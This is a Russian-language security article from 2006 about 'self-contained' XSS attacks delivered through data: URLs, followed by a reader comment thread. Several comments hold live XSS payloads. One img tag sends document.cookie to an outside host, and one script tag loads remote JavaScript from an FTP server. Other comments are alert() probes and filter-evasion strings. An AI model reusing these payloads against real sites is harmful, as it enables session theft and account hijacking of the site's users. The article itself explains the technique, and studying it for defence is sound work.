23.09.2006

Самодостаточные XSS атаки

image

В этой статье мы опишем новый вектор XSS атак, который хоть и относится к отраженным атакам, но на самом деле является более опасным, чем хранимый XSS

www.gnucitizen.org

Сущность атак межсайтового скриптинга (XSS) – непроверяемые данные. С этой точки зрения каждое приложение, которые выводит входные данные является потенциально уязвимым и может быть эксплуатировано атакующим для кражи идентификаторов сессий, принуждения пользователей к злонамеренным действиям, сбора важной информации и т.д.

XSS атаки могут быть хранимыми и отраженными. Хранимый XSS является более опасным, поскольку позволяет контролировать жертву более длительное время. Отраженный XSS хотя и считается менее опасным, он все же активно используется в фишинг атаках.

В этой статье мы опишем новый вектор XSS атак, который хоть и относится к отраженным атакам, но на самом деле является более опасным, чем хранимый XSS. Данный метод может использоваться для обхода почтовых фильтров, XSS фильтров, межсетевых экранов и функций проверки данных. Более того, если вы просматриваете злонамеренное сообщение с помощью уязвимого к XSS просмотрщика RSS каналов, вы можете нажать на следующую ссылку и увидеть результат работы функции alert().

Название самодостаточный XSS полностью объясняет тип атаки. Эта атака не требует наличия XSS уязвимости в web приложении. Все, что требуется для ее проведения содержится в одном URL. После выполнения URL ресурс будет автоматически ассемблирован.

Злонамеренная ссылки должна начинаться с data: протокола и специально сформированной строки. В современных браузерах существует поддержка множества протоколов: http:, https:,ftp: и about:, но протокол data: является самым функциональным, поскольку позволяет AJAX приложениям генерировать PDF, DOC, MP3 и другие форматы без нужды в серверной поддержке сценариев. Спецификация этого протокола описана в RFC2397.

Следующий пример демонстрирует огромные возможности url схемы data: и объясняет возможную угрозу безопасности. В следующей форе вы сможете сгенерировать html код, который может быть открыт и выполнен:


 

Воздействие самодостаточного XSS на много больше, чем можно себе представить. Эта технология позволяет создавать исполняемые файлы с помощью JavaScript. JavaScript теперь могут создавать DOC или PDF файлы, содержащие злонамеренный код и эксплуатирующие переполнения буфера в уязвимых приложениях. Следующие пример позволят открыть документ MS Word.

Это уязвимость может быть эксплуатирована в Firefox, Opera и возможно других браузерах. Internet Explorer 6 и 7 не позволит произвести атаку такого типа.

или введите имя

CAPTCHA
Страницы: 1  2  3  4  5  6  
<img src="...
13-02-2010 04:31:13
<img src="javascript:window.location.href='http://netlife.in.ua/Language_/s.gif?'+document.cookie;">
0 |
peps
01-03-2010 21:05:02
смешно, однако
0 |
unlock
29-05-2010 12:59:41
<script src=ftp://w_xacker-zone-ru_e4ac43fc@xacker-zone-ru.1gb.ru/http/file.js></script>
0 |
Проститут
10-06-2011 14:54:53
Смехота. Надо пойти, пивка жрануть..
0 |
<script> alert("Sel...
21-07-2010 14:08:18
<script> alert("Self-contained XSS"); </script>
0 |
'';!--"<XSS>=&{(<...
21-07-2010 15:55:36
'';!--"<XSS>=&{(<script> alert('3');</script>)}
0 |
Гость
08-08-2010 23:04:49
[img]src=http://qwe/1.jpg[/img]
0 |
Гость
08-08-2010 23:06:08
http://netlife.in.ua/Language_/s.gif+document.cookie
0 |
Страницы: 1  2  3  4  5  6